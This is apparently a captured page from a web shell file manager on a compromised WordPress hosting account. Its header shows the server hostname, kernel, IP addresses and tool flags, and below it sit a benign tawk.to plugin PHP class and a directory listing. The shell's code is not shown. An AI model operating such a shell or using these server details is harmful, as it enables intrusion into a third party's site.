🇳🇦🇲🇪♯➤ premium290.web-hosting.com 🇻♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾♯➤ 2025
𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/tdtravelandlogistics.com/wp-content/plugins/tawkto-live-chat/upgrades//base.php
<?php
/**
* Base class for upgrades
*/
abstract class TawkToUpgradeBase {
const VERSION = null;
/**
* Gets current upgrade's release version
*
* @return string Release version
* @throws Exception Release version is not defined.
*/
public static function get_version() {
if ( is_null( static::VERSION ) ) {
throw new Exception( 'Subclass must have const VERSION' );
}
return static::VERSION;
}
/**
* Upgrade script
*
* @return void
* @throws Exception Subclass has no upgrade implementation.
*/
public static function upgrade() {
throw new Exception( 'Subclass must implement this!' );
}
}
| 𝗡𝗔𝗠𝗘 |
𝗦𝗜𝗭𝗘 |
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛 |
𝗨𝗦𝗘𝗥 |
𝗦𝗧𝗔𝗧𝗨𝗦 |
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦 |
| .. | -- | 22 Jun 2026 6.38 AM | tdhomesa / tdhomesa | 0755 | |
| | | | | |
| base.php | 0.618 KB | 28 Jan 2022 1.46 PM | tdhomesa / tdhomesa | 0644 | |
| version.070.php | 1.99 KB | 28 Jan 2022 1.46 PM | tdhomesa / tdhomesa | 0644 | |
| version.090.php | 0.888 KB | 27 Jan 2025 11.54 AM | tdhomesa / tdhomesa | 0644 | |